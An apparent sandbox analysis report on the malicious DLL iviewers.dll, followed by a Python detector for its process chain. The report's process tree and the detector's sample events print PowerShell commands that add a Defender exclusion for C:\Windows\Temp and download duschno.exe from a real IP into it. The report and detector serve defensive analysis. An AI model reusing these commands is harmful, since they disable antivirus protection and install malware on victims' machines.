Analysis
max time kernel: 119s
max time network: 121s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 19/12/2024, 07:25
Static task: static1
Behavioral task: behavioral1
Sample: iviewers.dll
Resource: win7-20240729-en
General
Target: iviewers.dll
Size: 6KB
MD5: e017be56699801dc89a8d6d1724eb633
SHA1: a7f7aae4744210db8ebaf4da06c167357bc71eca
SHA256: aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564
SHA512: 2368425dadc7f22eb11532359d4d1aa97bf3e381f4fd7b62c587e1f8819ef64a0ff7fc75cc5948939fadebc423345ab65a1cd2799bb4136fbea89d1f75dfc8c8
SSDEEP: 96:fNnyOybUJQ23GgX791qKilsZODTgFZP/8R:fNnyOybrVO9QKilhfgFZP/u
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Runs PowerShell to modify Windows Defender settings by adding exclusions for file extensions, paths, or processes. In this run the exclusion is a path (Add-MpPreference -ExclusionPath 'C:\Windows\Temp'), the same directory the second PowerShell instance downloads its payload into.
pid    Process
2944   powershell.exe
2596   powershell.exe

Program crash (1 IoC)
pid    pid_target   Process        procid_target
2640   2732         WerFault.exe   30

System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.
description   ioc                                                           Process
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   regsvr32.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid    Process
2944   powershell.exe
2596   powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
description               pid    Process
Token: SeDebugPrivilege   2944   powershell.exe
Token: SeDebugPrivilege   2596   powershell.exe

Suspicious use of WriteProcessMemory (19 IoCs)
description                         pid    Process        procid_target   occurrences
PID 2716 wrote to memory of 2732    2716   regsvr32.exe   30              7
PID 2732 wrote to memory of 2944    2732   regsvr32.exe   31              4
PID 2732 wrote to memory of 2596    2732   regsvr32.exe   33              4
PID 2732 wrote to memory of 2640    2732   regsvr32.exe   35              4
Processes

1. C:\Windows\system32\regsvr32.exe (PID 2716)
   Command line: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\regsvr32.exe (PID 2732)
      Command line: /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2944)
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
         - Command and Scripting Interpreter: PowerShell
         - System Location Discovery: System Language Discovery
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2596)
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\lrak4gvn.ya5.exe'"
         - Command and Scripting Interpreter: PowerShell
         - System Location Discovery: System Language Discovery
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

      3. C:\Windows\SysWOW64\WerFault.exe (PID 2640)
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 800
         - Program crash
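Detection logic for the chain above, written as an added example for this page; it is not part of the Triage report or its tooling. It walks constructed process-creation events (the fields Sysmon Event ID 1 or Security 4688 carry) that mirror the report's PIDs and command lines, plus one benign control event, and flags PowerShell spawned by regsvr32, Add-MpPreference exclusion changes, download cradles, and the combination that matters here: a payload written into a directory excluded in the same batch. The event records, the rule names, the parent PID 1500 and the control event PID 3100 are assumptions.

```python
"""Flag the regsvr32 -> powershell -> Defender-exclusion -> download chain.

Added example, not code from the Triage report. Input is a list of
constructed process-creation events, not captured telemetry.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / Security 4688 fields)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events mirroring the report's process tree (PIDs 2716..2640) plus a
# benign control shell (PID 3100) started by an assumed parent PID 1500.
SAMPLE_EVENTS = [
    ProcEvent(2716, 1500, r"C:\Windows\system32\regsvr32.exe",
              r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll"),
    ProcEvent(2732, 2716, r"C:\Windows\SysWOW64\regsvr32.exe",
              r"/s C:\Users\Admin\AppData\Local\Temp\iviewers.dll"),
    ProcEvent(2944, 2732, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"'''),
    ProcEvent(2596, 2732, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\lrak4gvn.ya5.exe'"'''),
    ProcEvent(2640, 2732, r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 800"),
    ProcEvent(3100, 1500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -Command Get-Process"),
]

POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
# Add-MpPreference with any of the three exclusion kinds; group 1 is the value.
EXCLUSION_RE = re.compile(
    r"add-mppreference\b.*?-exclusion(?:path|extension|process)\s+['\"]?([^'\"]+)", re.I)
# Common download cradles (curl/wget are Invoke-WebRequest aliases in Windows PowerShell 5.1).
DOWNLOAD_RE = re.compile(
    r"\b(?:iwr|invoke-webrequest|curl|wget|start-bitstransfer|downloadfile|downloadstring)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
OUTFILE_RE = re.compile(r"-outfile\s+['\"]?([^'\"\s]+)", re.I)


def _is_powershell(image: str) -> bool:
    return image.lower().endswith(POWERSHELL_IMAGES)


def _is_regsvr32(image: str) -> bool:
    return image.lower().endswith("\\regsvr32.exe")


def detect(events):
    """Return findings as dicts {pid, rule, detail} for the given events."""
    by_pid = {e.pid: e for e in events}
    findings, excluded_paths = [], []
    for e in events:
        if not _is_powershell(e.image):
            continue
        parent = by_pid.get(e.ppid)
        if parent is not None and _is_regsvr32(parent.image):
            findings.append({"pid": e.pid, "rule": "regsvr32_spawns_powershell",
                             "detail": {"parent_pid": parent.pid, "parent_cmdline": parent.cmdline}})
        m = EXCLUSION_RE.search(e.cmdline)
        if m:
            value = m.group(1).strip()
            excluded_paths.append(value)
            findings.append({"pid": e.pid, "rule": "defender_exclusion", "detail": {"exclusion": value}})
        if DOWNLOAD_RE.search(e.cmdline):
            url, out = URL_RE.search(e.cmdline), OUTFILE_RE.search(e.cmdline)
            findings.append({"pid": e.pid, "rule": "download_cradle",
                             "detail": {"url": url.group(0) if url else None,
                                        "outfile": out.group(1) if out else None}})
    # Second pass over a copy: correlate downloads with exclusions regardless of event order.
    for f in [f for f in findings if f["rule"] == "download_cradle"]:
        out = f["detail"]["outfile"]
        if out is None:
            continue
        for p in excluded_paths:
            if out.lower().startswith(p.lower().rstrip("\\") + "\\"):
                findings.append({"pid": f["pid"], "rule": "download_into_excluded_path",
                                 "detail": {"outfile": out, "exclusion": p}})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["pid"], f["rule"], f["detail"])
```

Match on the image path suffix rather than the full path: in this run the 32-bit regsvr32 launched "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" on the command line, but the image that actually executed is the SysWOW64 copy because WOW64 file-system redirection rewrites System32 for 32-bit callers. A rule keyed on the literal System32 path would miss both PowerShell instances here.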
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB
MD5: d843ad1d3a565ffd71df08167123e449
SHA1: da34109ca4b2d3b93676e2d9a722e5021bf09dc2
SHA256: 7c8cf9821671b458f977437a505940f12a7428098d0d589f16abfb454d8b3b88
SHA512: 31ac7fd3cfb1b0cca94a443bf112294ba3b19ea84f6b111c4becfa622540177ac1d9e7696c2011f9df426868c242ed2aa1eb8bb2010b686a0ace9be631ca2118

The only file listed is a Windows jump-list (CustomDestinations) artifact; the payload path written by PID 2596, C:\Windows\Temp\lrak4gvn.ya5.exe, does not appear in this list, and the Network section above records nothing.